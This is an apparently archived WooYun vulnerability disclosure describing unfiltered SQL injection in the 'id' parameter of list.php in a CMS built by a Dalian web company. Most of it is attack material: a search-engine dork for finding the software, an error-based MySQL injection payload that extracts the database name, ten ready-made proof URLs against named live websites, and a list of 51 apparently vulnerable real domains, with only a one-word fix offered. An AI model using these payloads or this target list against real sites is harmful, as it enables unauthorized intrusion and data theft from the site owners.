漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-11-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-02-16: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
RT~
支持联合查询~
详细说明:
技术支持:合众商道(大连)科技有限公司inurl:list.php?id=
id=参数木有过滤
exp:list.php?id=2 AND (SELECT 5351 FROM(SELECT COUNT(*),CONCAT(0x5c
,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
漏洞证明:
http://dlmct.com//list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
http://china-ymf.com//list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
http://www.yxohq.com//list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
http://yfgl.cn//list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
http://bld-pcb.com//list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
http://www.cnjizhuangdai.com//list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
http://www.p-yuan.com//list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
http://dlshs.cn//list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
http://dlbaoxiang.cn//list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
http://xhmold.com.cn/list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
1. dldjsb.cn
2. www.wfdxh.cn
3. arc.net.cn
4. xhmold.com.cn
5. www.lengbingqi.com
6. dlyuhe.com.cn
7. www.dlxz.cn
8. dlyumex.com.cn
9. www.kuoshen.net
10. dlbaoxiang.cn11. hkyeya.cn
12. dlshs.cn
13. dlnc.cn
14. dlhailin.com
15. www.peanutschina.com
16. www.dlxiehe.cn
17. www.p-yuan.com
18. liquorstore.com.cn
19. cn-dhhd.com
20. www.runfine.cn
21. daliansy.com
22. www.bld-pcb.com
23. yfgl.cn
24. woodsh.cn
25. dl-ht.cn
26. www.specialsteels.cn
27. www.mst-dl.cn
28. catlitter.com.cn
29. zyjc1018.com
30. www.dl-dishui.com
31. china-ymf.com
32. xtsc.cn
33. bld-pcb.com
34. dlzxhg.cn
35. en.cmmsn.net
36. dlmct.com
37. dlxz.cn38. ytcx.com.cn
39. runfine.cn
40. www.xinyida.cc
41. www.dltcnet.com
42. dl-jd.com
43. www.zk-dl.com
44. www.yxohq.com
45. www.fdlc.net
46. cmmsn.net
47. www.cnjizhuangdai.com
48. dlszport.com
49. www.dlsanxie.com
50. cnjizhuangdai.com
51. dlhanfeng.com
修复方案:
过滤
版权声明:转载请注明来源 郭斯特@乌云
>
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝